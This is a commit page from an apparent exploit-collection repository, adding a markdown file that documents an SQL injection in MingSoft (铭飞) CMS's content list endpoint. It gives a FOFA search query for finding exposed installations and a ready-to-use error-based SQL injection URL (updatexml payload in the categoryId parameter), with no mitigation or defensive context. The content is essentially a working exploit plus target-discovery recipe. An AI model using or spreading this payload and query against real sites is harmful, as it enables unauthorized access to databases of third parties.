admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 铭飞CMS list接口存在SQL注入.md

Browse Source
This commit is contained in:
wy876 2023-12-23 18:24:34 +08:00 committed by GitHub
parent e72500f1e7
commit beed962c23
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
铭飞CMS list接口存在SQL注入.md Normal file
View File

@ -0,0 +1,12 @@
## 铭飞CMS list接口存在SQL注入
## fofa
```
body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"
```
## poc
```
http://127.0.0.1/cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271
```
![image](https://github.com/wy876/POC/assets/139549762/9f9df303-e0b5-4707-a3a8-228e97ab74a0)